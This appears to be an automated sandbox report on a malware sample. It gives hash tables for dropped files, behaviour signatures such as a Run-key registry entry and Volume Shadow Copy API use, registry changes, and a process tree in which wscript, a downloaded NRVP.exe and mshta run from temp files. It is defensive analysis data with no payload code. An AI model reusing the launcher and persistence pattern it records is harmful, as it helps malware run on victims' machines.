| MD5 | d4fc49dc14f63895d997fa4940f24378 |
| SHA1 | 3efb1437a7c5e46034147cbbc8db017c69d02c31 |
| SHA256 | 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1 |
| SHA512 | cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e7cf576c4d856d9fd2abfbe550be38fb |
| SHA1 | 126721c2a913ad361442b0a1c88e0da0e2b7c286 |
| SHA256 | 1282c84d0de6f39e588a8d7a44096436f4f6f2ec187d8d20083ddd4638a12310 |
| SHA512 | a5c6d2ed9107fcef31d01a78d441da5a984d44eb0d1160b659e4dfd65ca6b1a222944459e57d638c707cff7c298b816ed87fa479083cf535861bc711667651c0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
| MD5 | 03367e347ccce0a47f075d604f57661e |
| SHA1 | 9dc562d4b55d64817109fb93abc9edc448962bcb |
| SHA256 | 381e23e80f00bc844e44f53c2a88fd0039ce9e2ee8edee357cdc4de6890af94e |
| SHA512 | a8fbdb8545d0fd0d6b594e4f3f31f10e24713182f735aeee5b87e147dbbf8322c24f5e6b39449f6093bd539d11d94501d605ec82c0a1ad1f7b71f01c0beb1231 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
| MD5 | ccc8e24ca3e52af407d98bd3de95e7c8 |
| SHA1 | 6b77deda9d6c7fcbfae054448d6a327929c1902f |
| SHA256 | d53f89ee462d0f7679664191403d8715ba7358bffe711de87e83257810bd5fb8 |
| SHA512 | 88aee8daa4fbddfa3a7aaff3bce49dcac2b80ba7a7bc1c0eef7b008175d14c0e380f7e6fbe8d1398d08933de27ff52e57853a244cbce063cb245b233c7dbc7b6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 5a0cefa8e467ba3dc46795d95d44f60c |
| SHA1 | 23f1540a754c0851020bb83edb5df0dd3d1f5951 |
| SHA256 | 8e6f56a8f2ce6e50cb128045423551835c5766a35df7aa4c1c76199e45bec8fd |
| SHA512 | 818e8a8fa6eaad81dc2006a85c526c195b8ff073a82e8364ff676087534be9db30b679fdc6ab5392c98ad2625b4329a286d981dcb8cfd67884f97ec9a745f9ec |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | cdd15872ee2d5eefbcf02829ef4428e9 |
| SHA1 | f50bbfe34c1e77ac352dcfdf56384d87f8914798 |
| SHA256 | bf4cff94a561830df9493c07c1412d34fb88736c49ff3f7bd1ccd407f967123b |
| SHA512 | 00e7f5bfdf795a11b23ba8382bf10b9df3f7adb618b419732df2ab02a677f7a745d45f0a7e92dc8661dbf3616d584d6b0cc22387b116debc8fcdb70c07edcb38 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 7ea028f02cd0e22d05b17421103aca9c |
| SHA1 | 3e84758d0e91b97135d6edfa84815ee7ae091881 |
| SHA256 | 30da578b2f3bcf0eadfea1aba637d650dab8c14c9145d7de4f5e5fa5af82e7d5 |
| SHA512 | a9f8587d6366e5ae8dfc67616b55d8545262913fd1561e8781f8d30714576ec7c7ff29951c62b7f2cc7f9139fed711f3ab7942c6f715c3dfb555746433874480 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\B1655L9N\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c8ba58b3ee9d50564f7cf3d1bd3cf01b |
| SHA1 | ed6f2fe4c4ce2f29d61074fcc881995e7ef582ba |
| SHA256 | 8081b0bb4ce2b8cbea3516442c28edc3539a43795966bb9d0736cbf42784187b |
| SHA512 | 2d01b384fb81b0cb21b6291eca49e0b50a2d2b2c1b91ac3024876ec66987e41070a4f80c8866c45ceab3f9fb2174d11212bf218d5de6b6cdfa9a11f3ee7fc18b |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\L7V276SL\www.vice[1].xml
| MD5 | 7725ea6cd44d2909d60df5612f858c8f |
| SHA1 | 8c6dec17ce24326b15141c318dbeb133b755c981 |
| SHA256 | 3f3b2a1d3b56cee6ff5313784006fa33f0d8623adef642f3d709bc04d6deeac6 |
| SHA512 | 55529de9399819cc1aded5ab4e47a5b3373cc1b68c344cdf3ea3ba44da0f60d63ef8d32af30a3bfe54d0f6dd24137096d29792385c1bcb32fcef030921f4f0c9 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\JT6UB71Z\coast-228x228[1].png
| MD5 | b17926bfca4f7d534be63b7b48aa8d44 |
| SHA1 | baa8dbac0587dccdd18516fa7ed789f886c42114 |
| SHA256 | 885cf4c748081f6e569c4c5432249084eded544d55f7c85cf47ec1aebe6bdcd6 |
| SHA512 | a99269cc3c0af6a291e5373c4e488eaa3900e66bc3342933da3a18caff5401a4408aa1cb4463fac649c3cc5d88773f789fb120e292ed956188f1f5eda8ca7633 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\8GX1FX0U\f[1].txt
| MD5 | af94232d501a9f66882966bfcca63e97 |
| SHA1 | d89265fd538e7a6c86515b40439ed2a604480558 |
| SHA256 | 55220495fd8098bc63335cabf84f98d9a6da0e18722362a34e36f9be0096e4ca |
| SHA512 | e2c5db65955456833bdc53653b03533d00edf55e98ba89e90c1cd93d0f406197d7127d066692fd2a5da3869c0659810c71ade2a104cd1961e1fede4c98d0069e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | eedeed9876a9eeaadb9b8ba626ab0015 |
| SHA1 | 978776738b56ad01b84233c16626260c950cb212 |
| SHA256 | 7734302e804cc9b485f45f7ddc98b31711d27ea33f6422ad6a9f98547d53a979 |
| SHA512 | fcbac95f2883dac93de6a24e29212bd4797dfc6765026d7bf59c0a136a1dc759e498ee748a8128d6231403a6fe04cd1df00620d596fd7a9a782f1b752811bef6 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\8GX1FX0U\embed[1].js
| MD5 | 2d7da02c551158ff6f91de3289efad7f |
| SHA1 | c2a0c8415c36a2e71f80a0eb2f4aac83908e261b |
| SHA256 | 9e89a92b0ee6959fc76460b414049e3bd12fbe00b119e5a6bdc51faf9f37a9cc |
| SHA512 | b40671fa1e2486539f6846384a5361e83c466ca9b59d0d331fd546ffd224acbe045baed07b0a61e5096e42e98464e35e1b34f62720e3a6f3e8587fe4a811e880 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\QVYJTL8Z\channels[1].js
| MD5 | 78bb8775868abec561b1a3f18d682f65 |
| SHA1 | 96be69af2a2189e70bc49636e34e4babff3ea016 |
| SHA256 | 5e4fe417a7f4ec6f7d890d8858d170f05955cb4df3d5128a62610eace99451a6 |
| SHA512 | 846be49a0f8053b0ee5ec1c1cdd50a344a07fc778caa6a0bc610239775a678ff981293da00eddd72a1f89b6e24154874f44d6a99dffaff3d0919d5967d3f796a |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VQQO0343\scevent.min[1].js
| MD5 | 23ee68cb3f8beba5b89757bd62e74ecd |
| SHA1 | e26d77a70bdc288d95ab5c58d9b4a61ccd99ec95 |
| SHA256 | 808dd8595893da8dbd66a3357ae3a86a33a927e0ce91703b9d2260272e95e0f5 |
| SHA512 | 26050304d04eeee8e74f1ad708a737cc83234130e310486b55fc9869a288944b7a4afb4ee85b7dfab927805d1183613b72c863ef13d6e600354a11ab0a65bb02 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\0FQZCJPO\tr.snapchat[1].xml
| MD5 | 70a51c07be85861e8bbfee311f6aaa05 |
| SHA1 | c9652e21b7a0f2049cb407795cc3f0936028c5d5 |
| SHA256 | 711aa80178697f5f2bdd8006b40cdde48150863f34e8f178b0737da0e545eb1a |
| SHA512 | 035390076c890de4b446499caf167bb9eb6826802ca86e39cddd115938232ab834f7ec16a2e0a4c19ac1672144cd8b12df7043efb94ed8894678262fc68e695b |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\QVYJTL8Z\cx[1].js
| MD5 | 5fcc59137a3ad79ece3b8d70155be895 |
| SHA1 | a302ed4aac376c99d09ffff29a8343d693266d37 |
| SHA256 | a800fde51ec9a5181e3171e21f3fc5d30dcd5c7498391f4250a3b3ca6dc29fe6 |
| SHA512 | da4e28c471975794836f70e2c27685ccc885d2af611714b3cae2642f74f8c7e508495d2331f2e3f0793748c32b2a41cfa6231e3b7154fb36bb564944c367d7aa |
Analysis: behavioral2
Detonation Overview
Submitted
2023-04-11 14:43
Reported
2023-04-11 15:14
Platform
win7-20230220-en
Max time kernel
1187s
Max time network
1729s
Command Line
Signatures
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\NRVP.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\Downloads\NRVP.exe |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3F4F8D51-D88A-11ED-8645-C29C0423A1DF} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\.js
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fefaef9758,0x7fefaef9768,0x7fefaef9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1436 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2212 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2188 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1464 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2440 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3872 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3756 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3972 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=2808 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=984 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3552 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3368 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4768 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3608 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3972 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4152 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4224 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4816 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3972 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:8
C:\Users\Admin\Downloads\NRVP.exe
"C:\Users\Admin\Downloads\NRVP.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\NRVP865\.hta"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1176 -s 956
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4384 --field-trial-handle=1288,i,11834396318156004596,6016270183588041901,131072 /prefetch:8
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2268 CREDAT:275457 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fefaef9758,0x7fefaef9768,0x7fefaef9778
C:\Program Files\Google\Chrome\Application\chrome.exe
